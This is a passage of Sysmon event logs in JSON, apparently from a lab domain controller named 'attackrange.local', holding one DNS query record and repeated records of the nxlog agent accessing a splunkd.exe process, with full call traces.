{"EventTime":"2020-08-01 06:54:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":4636,"ProcessID":2928,"ThreadID":3400,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:28.948\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nProcessId: 2916\r\nQueryName: win-dc-8400769.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\dfsrs.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 06:54:28.948","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-001094C70200}","QueryName":"win-dc-8400769.attackrange.local","QueryStatus":"0","QueryResults":"fe80::bd2f:79cc:df6c:109f;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\dfsrs.exe","EventReceivedTime":"2020-08-01 06:54:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:31","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4637,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:31.514\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:31.514","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4638,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:32.514\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:32.514","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:33","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4639,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:33.515\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:33.515","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:34","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4640,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:34.515\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:34.515","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:35","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4641,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:35.515\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:35.515","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:36","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4642,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:36.515\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:36.515","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:37","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4643,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:37.516\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: 